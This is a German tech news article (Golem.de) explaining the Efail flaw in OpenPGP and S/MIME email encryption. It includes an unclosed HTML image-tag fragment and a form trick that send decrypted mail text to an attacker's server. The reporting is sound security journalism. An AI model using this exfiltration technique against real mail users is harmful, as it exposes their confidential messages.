Abo
  • Services:

PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. Dataport, Altenholz bei Kiel
  2. Dataport, verschiedene Einsatzorte

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


Anzeige
Top-Angebote
  1. (aktuell Canon EOS 200D inkl. Objektiv 18-55 mm für 444€ - Bestpreis!)
  2. 137,94€ (Ersparnis ca. 50€)

mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Mr Miyagi 15. Mai 2018

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...


Folgen Sie uns
       


Apple Watch 4 - Fazit

Die neue Apple Watch bleibt für uns das Maß aller Smartwatch-Dinge.

Apple Watch 4 - Fazit Video aufrufen
15 Jahre Extreme Edition: Als Intel noch AMD zuvorkommen musste
15 Jahre Extreme Edition
Als Intel noch AMD zuvorkommen musste

Seit 2003 verkauft Intel seine CPU-Topmodelle für Spieler und Enthusiasten als Extreme Edition. Wir blicken zurück auf 15 Jahre voller zweckentfremdeter Xeon-Chips, Mainboards mit Totenschädeln und extremer Prozessoren, die mit Phasenkühlung demonstriert wurden.
Von Marc Sauter

  1. Quartalszahlen Intel legt 19-Milliarden-USD-Rekord vor
  2. Ryan Shrout US-Journalist wird Chief Performance Strategist bei Intel
  3. Iris GPU Intel baut neuen und schnelleren Grafiktreiber unter Linux

Dell Ultrasharp 49 im Test: Pervers und luxuriös
Dell Ultrasharp 49 im Test
Pervers und luxuriös

Dell bringt mit dem Ultrasharp 49 zwei QHD-Monitore in einem, quasi einen Doppelmonitor. Es könnte sein, dass wir uns im Test ein kleines bisschen in ihn verliebt haben.
Ein Test von Michael Wieczorek

  1. Magicscroll Mobiles Gerät hat rollbares Display zum Herausziehen
  2. CJG50 Samsungs 32-Zoll-Gaming-Monitor kostet 430 Euro
  3. Agon AG322QC4 Aggressiv aussehender 31,5-Zoll-Monitor kommt für 600 Euro

Dark Rock Pro TR4 im Test: Be Quiet macht den Threadripper still
Dark Rock Pro TR4 im Test
Be Quiet macht den Threadripper still

Mit dem Dark Rock Pro TR4 hat Be Quiet einen tiefschwarzen CPU-Kühler für AMDs Threadripper im Angebot. Er überzeugt durch Leistung und den leisen Betrieb, bei Montage und Speicherkompatiblität liegt die Konkurrenz vorne. Die ist aber optisch teils deutlich weniger zurückhaltend.
Ein Test von Marc Sauter

  1. Dark Rock Pro TR4 Be Quiets schwarzer Doppelturm kühlt 32 Threadripper-Kerne

    •  /